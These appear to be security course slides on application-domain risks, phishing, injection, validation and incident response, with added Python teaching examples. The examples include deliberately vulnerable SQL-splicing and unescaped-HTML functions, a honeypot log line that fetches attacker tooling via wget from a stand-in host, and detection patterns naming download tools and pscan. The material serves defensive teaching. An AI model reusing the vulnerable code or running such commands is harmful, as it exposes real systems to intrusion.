Birlin, Bonds, Ramani and Reeds

The system/application domain consists of all of a business's mission-critical systems, applications, and data. It is important to ensure that this domain is secure at all times; otherwise a business could easily lose large amounts of sensitive information as well as face the threat of having productivity come to a halt. Commonly targeted systems and applications are operating systems (desktop, server, and network), e-mail applications and servers, Enterprise Resource Planning (ERP) applications and systems, and web browsers.

Confidentiality: a requirement that private or confidential information not be disclosed to unauthorized individuals. Issues related to this are:
- Network security protocols
- Network authentication services
- Data encryption services
Consequences:
- HIPAA fines
- SOX violations
- Users will lose confidence that their data is secure.
- Loss of customers.
- Supply chain risk

Integrity: data integrity is a requirement that information and programs are changed only in a specified and authorized manner. System integrity is a requirement that a system performs its intended function in an unimpaired manner, free from deliberate or inadvertent unauthorized manipulation of the system. Issues related to this are:
- Firewall services
- Communications security management
- Intrusion detection services
Consequences:
- Data corruption
- Unsure of good points to roll back to.
- Loss of confidence in users and customers
- Possible HIPAA or SOX fines.
- Users may not see accurate data, much less believe the data!

Availability: a requirement intended to ensure that systems work promptly and service is not denied to authorized users. Typically, non-critical applications should stay available 99.5% of the time, and critical ones 99.9%.
Critical apps typically are:
- Supply chain
- HR
- Accounting
Issues related to availability are:
- Fault tolerance for data availability (back-ups, redundant disk systems)
- Acceptable log-ins and operating process performance
- Reliable and interoperable security processes and network security mechanisms
Consequences:
- Workers are not able to complete their tasks in a timely manner.
- Loss of confidence from customers and users.
- Calls and services abandoned by users.
- Users and customers will find a provider that can meet their SLA requirements!
- Up to 20 years prison time. Fines from $100k to $5M.

Security risks arise in:
- the physical environment of the system
- personnel management
- administration procedures and security measures within the organization
- business operation and service delivery
- hardware, software, communication equipment and facilities, and their combinations

Physical environment:
- Surveillance cameras not installed in server rooms to deter unauthorized access.
- Application and database servers not placed in a server room which is secured by a key pad or lock.
- Hardware loggers
- Application servers sitting under people's desks!

Personnel and administration:
- Employees who improperly download software to their machines run the risk of installing malware with it. Employee machines should not be issued with rights that let the employee install unauthorized software. Installs on employee machines can be monitored using a tool such as Eracent.
- There is a tendency to grant too many rights to users. The default should not be an administrator, but a lesser set of roles.
- System administrators do not set up firewalls, servers, databases and OS software properly to prevent attacks. The reason is that additional security protocols add a higher level of rigor to day-to-day operations.

Software and configuration:
- Sensitive folders use common names, such as Admin. This tells your attacker exactly where to look. Sadly, many recommendation guidelines tell your user to do exactly this!
- Improper folder setup, allowing your attacker to browse the contents of your site.
- Improper setup of error handling, giving a stack trace of your code to the outside user when exceptions are thrown.
- Remote code execution: as the name suggests, this vulnerability allows an attacker to run arbitrary, system-level code on the vulnerable server and retrieve any desired information contained therein. Improper coding errors lead to this vulnerability. Products which have had this: phpBB, Invision Board, cPanel, PayPal cart, Drupal, and many others.
- The default configuration of many sites is set up in a way that users of the site have full privileges!
- Sensitive data is commonly exposed to the outside world.
- Software not kept up to date. Some server admins are not vigilant in ensuring the latest versions of application software are installed on desktops. Last year saw some particularly damaging attacks through Java, Acrobat and Flash. These attacks could have been prevented by proper patching.
- There are a multitude of add-ons for your web applications; however, web administrators do not properly lock down these user-based reports. Worldwide, 170K AWStats reports are available. ELMAH error handling can be found by good attackers, which gives full stack traces!

The application domain is a high-risk domain now. Improper and lax security techniques plus high-reward targets mean risks will continue into the future. Users with a low knowledge base also mean attackers have ripe opportunities there as well.

OWASP: a nonprofit organization not attached to any software company. It releases a list of the top 10 security threats on an annual basis, for both desktop and mobile platforms. Core purpose: "Be the thriving global community that drives visibility and evolution in the safety and security of the world's software."

Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by an attacker to introduce (or "inject") code into a computer program to change the course of execution. The results of a code injection attack can be disastrous.
For instance, code injection is used by some computer worms to propagate. SQL, LDAP and OS injection still rank as the #1 threat per OWASP.

Cross-site scripting (XSS) allows attackers to inject JavaScript code into your hosted page, thus executing malware on your own site. Textboxes are where this code can be inserted. Data saved into the database can then be used against other users of the site. In other words, I'm hosting my own malware! 84% of all security vulnerabilities, as documented by Symantec.
https://www.youtube.com/watch?v=qO3iwAxkPxE
https://www.youtube.com/watch?v=FwIUkAwKzG8

Broken authentication and session management allows attackers to compromise session tokens and keys to assume other users' identities. If the session ID is compromised, attackers can impersonate other users on the system.

Phishing is a way of attempting to acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication.

Spear phishing: phishing attempts directed at specific individuals or companies have been termed spear phishing.[35] Attackers may gather personal information about their target to increase their probability of success.

Clone phishing: a type of phishing attack whereby a legitimate, and previously delivered, email containing an attachment or link has had its content and recipient address(es) taken and used to create an almost identical or cloned email. The attachment or link within the email is replaced with a malicious version and then sent from an email address spoofed to appear to come from the original sender. It may claim to be a resend of the original or an updated version of the original. This technique could be used to pivot (indirectly) from a previously infected machine and gain a foothold on another machine, by exploiting the social trust associated with the inferred connection due to both parties receiving the original email.
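Returning to the injection and cross-site scripting items above: the following is an added example, not code from the slides or their authors, showing the vulnerable pattern beside its hardened form for both problems. The user table, the names in it and the stored markup are constructed sample data; the parameterized query stops a quote in the input from changing the SQL statement, and HTML output encoding (the role AntiXSS or AntiSamy play on the MS and Java stacks) turns stored markup into harmless text instead of running it in other visitors' browsers.

```python
import html
import sqlite3


def make_db():
    """Constructed in-memory user table (example data, not from the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, bio TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [
            ("alice", "Hi, I am Alice."),
            ("o'brien", "A quote in the name is legitimate data."),
            # A bio typed into a textbox that carries markup: stored verbatim,
            # it would execute in every other visitor's browser (stored XSS).
            ("mallory", "<script>alert('xss')</script>"),
        ],
    )
    conn.commit()
    return conn


def find_user_unsafe(conn, name):
    """VULNERABLE: the untrusted value is spliced into the SQL text, so a
    quote character ends the string literal and the remainder is parsed as SQL."""
    sql = "SELECT name FROM users WHERE name = '%s'" % name
    return [row[0] for row in conn.execute(sql)]


def find_user_safe(conn, name):
    """Hardened: a parameterized query sends `name` as a bound value; the
    database never parses it as SQL, whatever characters it contains."""
    rows = conn.execute("SELECT name FROM users WHERE name = ?", (name,))
    return [row[0] for row in rows]


def lookup_both(name):
    """Run one input through both versions and report what each returned."""
    conn = make_db()
    try:
        unsafe = find_user_unsafe(conn, name)
    except sqlite3.Error as exc:  # the spliced quote broke the statement
        unsafe = "SQL error: %s" % exc
    return unsafe, find_user_safe(conn, name)


def render_bio_unsafe(bio):
    """VULNERABLE: stored text placed straight into the page's HTML."""
    return "<p>%s</p>" % bio


def render_bio_safe(bio):
    """Hardened: output encoding makes markup display as text; quote=True also
    encodes the quote characters that matter inside attribute values."""
    return "<p>%s</p>" % html.escape(bio, quote=True)


def render_all_bios(safe=True):
    """Render every stored bio the safe or the unsafe way, ordered by name."""
    conn = make_db()
    render = render_bio_safe if safe else render_bio_unsafe
    rows = conn.execute("SELECT bio FROM users ORDER BY name")
    return [render(bio) for (bio,) in rows]


if __name__ == "__main__":
    print(lookup_both("o'brien"))   # unsafe query errors, safe query finds the row
    for paragraph in render_all_bios(safe=True):
        print(paragraph)
```

The name "o'brien" is ordinary data, yet it is enough to break the concatenated query: that same mechanism is what lets crafted input alter the statement, and it disappears entirely once the value is bound as a parameter. The encoded bio still shows the literal text the user typed, but the browser receives `&lt;script&gt;` rather than a script element.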
Whaling: several recent phishing attacks have been directed specifically at senior executives and other high-profile targets within businesses, and the term whaling has been coined for these kinds of attacks.

Website defacement: the motivation behind defacing websites is to obtain peer recognition in the attacker's community. It is also used by politically motivated hacktivists or cyber protestors. Usually done through SQL injection or a compromised FTP account. Much more difficult to defend against. These types of attacks typically result in loss of reputation in the community at large.

PHPShell is a PHP script which allows shell commands to be executed on a web server. Typically the PHPShell script is protected by a password so only the server administrator can access it. We deployed honeypots that advertise an unrestricted PHPShell application, which attackers often tried to exploit. Among other tools, attackers commonly downloaded and attempted to use a variant of pscan. Pscan is an efficient port scanner that can discover hosts which are listening on a particular port. Typically, the attacker would run the tool, obtain a list of hosts with the port open and then proceed to run an exploit tool against the list of hosts. A captured honeypot entry:
Date: 2006-09-09 12:20:40
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Command: wget http://evil.example.com/linux/fast.tgz

Port scans are commonly run. Commonly open ports are typically scanned, like 80, 8080, 8081.

Defense strategy questions:
- What is our defense strategy if we are attacked?
- How are we preparing to prevent an attack?
- Who is engaged in the defense of our company?

Application scanning tools: code analysis can be done using a tool such as HP Fortify. Simulated attacks: all attacks can be performed against the site using a tool such as HP WebInspect.

First rule: NEVER TRUST YOUR USERS.
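Putting the "never trust your users" rule and the validator types that follow it into working code, as an added example that is not part of the slides: each of the MS-stack validator kinds (date range, numeric range, regular expression, comparison, custom) becomes a small server-side function, a constructed sign-up form applies them, and the URL-encoding step is shown with the slide's own sample string. The form fields, their rules and the form values are assumptions for the example; note that Python's standard encoder also encodes "!" (as %21), whereas the encoder behind the slide's output left it alone, so the exact reserved set depends on the encoder you use.

```python
import re
from datetime import date, datetime
from urllib.parse import quote


def validate_date_range(value, low, high):
    """Date-range validator: an ISO date string that falls within [low, high]."""
    try:
        parsed = datetime.strptime(value, "%Y-%m-%d").date()
    except (TypeError, ValueError):
        return False
    return low <= parsed <= high


def validate_numeric_range(value, low, high):
    """Numeric-range validator: integer text within [low, high]."""
    try:
        number = int(value)
    except (TypeError, ValueError):
        return False
    return low <= number <= high


def validate_regex(value, pattern):
    """Regular-expression validator: the WHOLE value must match (fullmatch),
    so a valid prefix followed by trailing junk is rejected."""
    return isinstance(value, str) and re.fullmatch(pattern, value) is not None


def validate_comparison(value, other):
    """Comparison validator: two fields must agree, e.g. password and confirmation."""
    return value is not None and value == other


def validate_custom(value, predicate):
    """Custom validator: any business rule expressed as a predicate."""
    return bool(predicate(value))


def encode_for_url(value):
    """Percent-encode a value before it travels in a URL. safe="" encodes
    everything outside the unreserved set, including "/" and "!"."""
    return quote(value, safe="")


def _looks_like_email(value):
    # Deliberately simple constructed rule: one "@" and a dot in the domain part.
    return isinstance(value, str) and value.count("@") == 1 and "." in value.split("@")[1]


# Constructed rule set for a hypothetical sign-up form (assumption, not from the page).
SIGNUP_RULES = {
    "username": lambda v: validate_regex(v, r"[a-z0-9_]{3,16}"),
    "age": lambda v: validate_numeric_range(v, 13, 120),
    "start_date": lambda v: validate_date_range(v, date(2024, 1, 1), date(2024, 12, 31)),
    "email": lambda v: validate_custom(v, _looks_like_email),
}


def validate_signup(form):
    """Return the names of the fields that fail; an empty list means the form is
    clean. Every rule runs server-side: client-side checks are a courtesy, not a control."""
    failures = [field for field, rule in SIGNUP_RULES.items() if not rule(form.get(field))]
    if not validate_comparison(form.get("password"), form.get("password_confirm")):
        failures.append("password_confirm")
    return failures


if __name__ == "__main__":
    print(encode_for_url("I'm here to stay!"))  # the slide's sample string, encoded
    print(validate_signup({"username": "alice_01", "age": "17",
                           "start_date": "2024-03-15", "email": "alice@example.com",
                           "password": "s3cret!", "password_confirm": "s3cret!"}))
```

Validation and encoding are separate controls: validation rejects input that does not fit the field's contract, while encoding protects the value on its way into a URL, HTML page or query once it has been accepted. Both belong on the server, because anything done in the browser is under the user's control.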
Validation techniques from the MS stack:
- Date range validation
- Custom validation
- Numeric range validation
- Regular expression validation
- Comparison validation
String encoding of data before it goes to the server, otherwise known as sanitizing your inputs: AntiXSS for the MS stack and AntiSamy for the Java domain. For example:
Data from the web: I'm here to stay!
Encoded: I%27m%20here%20to%20stay!

Data protection:
- PII should always be encrypted in the database.
- Credit card information should always be encrypted.
- SSL should be used for all sensitive communications between your server and user.
- Proper VPN tunnels should be set up for remote users.

Monitoring:
- A security department should be implemented which monitors all incoming and outgoing traffic to the enterprise.
- This should be a vigilant process instead of addressing attacks as they occur (no more whack-a-mole).
- Users that are logged into the website should have some sort of audit trail of their actions, so as to determine the history of these users.
- A database log of inserts, adds and deletes allows us to track malicious activity by insiders.
- An ELMAH audit trail allows us to provide error logging hidden from the user.

Containment:
- Be ready to force enterprise-wide password changes should an attacker obtain elevated privileges.
- Isolate the environment from the Internet.
- Block egress traffic to known malicious C2 IP addresses and domains.
- Block dynamic DNS providers.
- Rebuild or replace compromised systems.

Employee awareness:
- Do employees know what to do if their machines are compromised?
- Do employees know how to tell good emails from bad ones?
- Do employees know what to do with suspicious emails?

Acceptable-use policy:
- Define computers, e-mail, Internet, and so on as broadly as possible, with specifics given, but not limited to such specifics.
- Remind employees that not only job loss, but also civil liability and criminal prosecution may result from certain actions (illegal pornography, participation in spamming operations or other scams, involvement in computer hacking (see 18 U.S.C.
§ 1030, among other laws)).
- The company needs to reserve the right to monitor all computer usage at all times for compliance with the policy.
- Right to inspect an employee's computer, HD, floppy disks, and other media at any time.
- Right to withdraw access to computers, Internet, and e-mail if needed.
- Consider prohibiting camera phones (also called cell phone cameras); such phones have been implicated in gross invasions of other employees' privacy and in theft of company secrets.
- Make sure employees know they have no reasonable expectation of privacy in their use of the company's electronic resources, since it is all company property and to be used only for job-related purposes.

So our company's assets have been compromised. What's next? The best line of defense is having a response strategy in place, from compromised assets to whole system loss.

Data loss:
1. Identify the last known time our system's data was stable.
2. Pull the data back-ups from that time, whether on disk or on tape.
3. Restore the data to the last known good data point.
Notify customers and users throughout the process of the data loss. Self-report to the authorities any possible HIPAA or SOX violations.

Data breach:
- Notify customers immediately of the breach, and possible data leakage, and advise them to change their passwords.
- Identify the source of the breach, through system logs, network logs and data logs.
- Notify authorities and press of the breach to stay in front of the situation.

System outage:
- Identify the source of the system outage.
- Acquire proper backups of systems to stand up in a different physical location.
- Restore our systems to new servers if need be.
- Blackhole DNS attacks to a spoofed IP address.
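The data-loss steps above (identify the last stable time, pull the backups from before it) and the breach step "identify the source through system logs" can be joined into one small piece of tooling. What follows is an added example, not code from the slides or their authors: it parses a command log in the same Date / User-Agent / Command layout as the honeypot entry shown earlier, flags commands that match the behaviour the honeypot narrative describes (fetching a tool from a remote host, running a port scanner such as pscan), takes the earliest flagged command as the breach start, and picks the latest backup taken strictly before it as the last-known-good restore point. The log lines other than the page's wget entry, the backup catalogue and the indicator patterns are constructed assumptions.

```python
import re
from datetime import datetime

# Constructed honeypot command log (example data). Only the wget line copies
# the entry shown on the page; the others are assumed for the example.
HONEYPOT_LOG = """\
Date: 2006-09-09 11:58:02
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Command: ls -la
Date: 2006-09-09 12:20:40
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Command: wget http://evil.example.com/linux/fast.tgz
Date: 2006-09-09 12:21:05
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Command: tar xzf fast.tgz
Date: 2006-09-09 12:24:30
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Command: ./pscan 80
"""

# Constructed backup catalogue: (time the backup was taken, medium). Assumed.
BACKUPS = [
    (datetime(2006, 9, 8, 6, 0, 0), "tape"),
    (datetime(2006, 9, 9, 6, 0, 0), "disk"),
    (datetime(2006, 9, 9, 18, 0, 0), "disk"),  # taken after the intrusion: not clean
]

# Indicators taken from the page's narrative: a remote fetch of tooling and a
# port scanner. Extend these with the names your own monitoring has seen.
DOWNLOAD_RE = re.compile(r"\b(wget|curl|tftp|ftp)\b")
SCANNER_RE = re.compile(r"\bpscan\b")


def parse_log(text):
    """Return (timestamp, command) pairs from the multi-line record format."""
    entries, current = [], None
    for line in text.splitlines():
        if line.startswith("Date:"):
            current = datetime.strptime(line[len("Date:"):].strip(), "%Y-%m-%d %H:%M:%S")
        elif line.startswith("Command:") and current is not None:
            entries.append((current, line[len("Command:"):].strip()))
    return entries


def is_suspicious(command):
    """True when the command matches one of the indicators above."""
    return bool(DOWNLOAD_RE.search(command) or SCANNER_RE.search(command))


def first_suspicious(entries):
    """Earliest flagged command, or None: the best available 'breach start' time."""
    for stamp, cmd in entries:
        if is_suspicious(cmd):
            return stamp, cmd
    return None


def last_known_good(backups, breach_time):
    """Latest backup taken strictly before the breach started (data-loss step 1);
    None means no clean restore point exists and the plan must say what then."""
    candidates = [b for b in backups if b[0] < breach_time]
    return max(candidates, key=lambda b: b[0]) if candidates else None


def triage(log_text=HONEYPOT_LOG, backups=BACKUPS):
    """Run the whole procedure and return the evidence an incident record needs."""
    entries = parse_log(log_text)
    flagged = [(stamp, cmd) for stamp, cmd in entries if is_suspicious(cmd)]
    start = first_suspicious(entries)
    restore = last_known_good(backups, start[0]) if start else None
    return {"flagged": flagged, "breach_start": start, "restore_point": restore}


if __name__ == "__main__":
    for key, value in triage().items():
        print(key, "->", value)
```

The "strictly before" comparison is the important edge: a backup taken after the first suspicious command may already contain the attacker's changes, so it is never offered as a restore point, and an empty candidate list is returned as None rather than silently falling back to the oldest backup.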